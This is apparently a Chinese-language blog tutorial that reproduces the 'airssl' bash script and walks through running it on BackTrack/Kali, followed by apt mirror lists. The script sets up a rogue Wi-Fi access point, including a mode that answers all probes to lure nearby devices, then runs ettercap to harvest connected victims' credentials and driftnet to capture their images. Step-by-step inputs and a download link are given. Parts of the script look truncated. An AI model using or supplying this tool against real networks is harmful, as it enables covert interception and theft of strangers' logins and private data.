(1 。打开 /etc/apt/sources.list 这个路径 找到sources.list 文件 然后用编辑器编辑 2 。把以下代码复制到sources.list 原来的要覆盖哈 deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing
# Network questions echo echo "AIRSSL 2.0 - Credits killadaninja & G60Jon " echo route -n -A inet | grep UG echo echo echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: " read -e gatewayip echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: " read -e internet_interface echo -n "Enter your interface to be used for the fake AP, for example wlan0: " read -e fakeap_interface echo -n "Enter the ESSID you would like your rogue AP to be called: " read -e ESSID airmon-ng start $fakeap_interface fakeap=$fakeap_interface fakeap_interface="mon0"
# Fake ap setup echo "[+] Configuring FakeAP...." echo echo "Airbase-ng will run in its most basic mode, would you like to configure any extra switches? " echo echo "Choose Y to see airbase-ng help and add switches. " echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. " echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. " echo "Y, N or A "
read ANSWER
if [ $ANSWER = "y" ] ; then airbase-ng --help fi
if [ $ANSWER = "y" ] ; then echo echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be redefined, also in this mode you MUST define a channel " read -e aswitch echo echo "[+] Starting FakeAP..." xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$! sleep 2 fi
if [ $ANSWER = "a" ] ; then echo echo "[+] Starting FakeAP..." xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$! sleep 2 fi
if [ $ANSWER = "n" ] ; then echo echo "[+] Starting FakeAP..." xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$! sleep 2 fi
# Ettercap echo "[+] Configuring ettercap..." echo echo "Ettercap will run in its most basic mode, would you like to configure any extra switches for example to load plugins or filters, (advanced users only), if you are unsure choose N " echo "Y or N " read ETTER if [ $ETTER = "y" ] ; then ettercap --help fi
if [ $ETTER = "y" ] ; then echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here For the sake of airssl, ettercap WILL USE -u and -p so you are advised NOT to use -M, also -i is already set and CANNOT be redifined here. Ettercaps output will be saved to /pentest/wireless/airssl/passwords DO NOT use the -w switch, also if you enter no switches here ettercap will fail " echo read "eswitch" echo "[+] Starting ettercap..." xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$! sleep 1 fi
if [ $ETTER = "n" ] ; then echo echo "[+] Starting ettercap..." xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$! sleep 1 fi
# Driftnet echo echo "[+] Driftnet?" echo echo "Would you also like to start driftnet to capture the victims images, (this may make the network a little slower), " echo "Y or N " read DRIFT
if [ $DRIFT = "y" ] ; then mkdir -p "/pentest/wireless/airssl/driftnetdata" echo "[+] Starting driftnet..." driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$! sleep 3 fi
clear echo echo "[+] Activated..." echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata " echo echo "[+] IMPORTANT..." echo "After you have finished please close airssl and clean up properly by hitting Y, if airssl is not closed properly ERRORS WILL OCCUR " read WISH
# Clean up if [ $WISH = "y" ] ; then echo echo "[+] Cleaning up airssl and resetting iptables..."
echo "[+] Clean up successful..." echo "[+] Thank you for using airssl, Good Bye..." exit
fi exit
为airssl.sh添加执行权限
root@bt:~/air# chmod 777 airssl.sh
最后执行airssl.sh文件。再执行(相关输入)
root@bt:~/air# ./airssl.sh
输入出口的网关地址,列如我的网关地址是:192.168.3.1 回车。
输入那个可以连接互联网的接口,列如我的是:eth0回车。
创建AP热点使用的接口,列如我的是:wlan0 回车。
创建AP热点的ESSID,就是你共享无线的名字,列如我的是:youku 回车。
自己翻译,输入n 回车。
会跳出此界面
自己翻译,输入n 回车。
又多一个Ettercap
自己翻译,输入y 回车。
多了一个driftnet
找一部手机来测试一下。
可以连接到“youku”这个无线。
链接: http://pan.baidu.com/s/1c05vHM4
密码: 4h3
补充:
开启无线监控:airmon-ng start wlan0
软件源:
#将下列地址复制进去就好 deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free #然后我们导入公钥 sudo apt-key adv --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6 #之后我们更新一下, apt-get update
上面这个是中科大的软件源
下面给出软件源的列表
中科大软件源
deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free
kali官方源的地址: deb http://http.kali.org/kali kali main non-free contrib deb-src http://http.kali.org/kali kali main non-free contrib deb http://security.kali.org/kali-security kali/updates main contrib non-free
kali新加坡源的地址: deb http://mirror.nus.edu.sg/kali/kali/ kali main non-free contrib deb-src http://mirror.nus.edu.sg/kali/kali/ kali main non-free contrib deb http://security.kali.org/kali-security kali/updates main contrib non-free deb http://mirror.nus.edu.sg/kali/kali-security kali/updates main contrib non-free deb-src http://mirror.nus.edu.sg/kali/kali-security kali/updates main contrib non-free
kali国内源的地址: deb http://ftp.sjtu.edu.cn/debian wheezy main non-free contrib deb-src http://ftp.sjtu.edu.cn/debian wheezy main non-free contrib deb http://ftp.sjtu.edu.cn/debian wheezy-proposed-updates main non-free contrib deb-src http://ftp.sjtu.edu.cn/debian wheezy-proposed-updates main non-free contrib deb http://ftp.sjtu.edu.cn/debian-security wheezy/updates main non-free contrib deb-src http://ftp.sjtu.edu.cn/debian-security wheezy/updates main non-free contrib deb http://mirrors.163.com/debian wheezy main non-free contrib deb-src http://mirrors.163.com/debian wheezy main non-free contrib deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib deb-src http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib deb http://mirrors.163.com/debian-security wheezy/updates main non-free contrib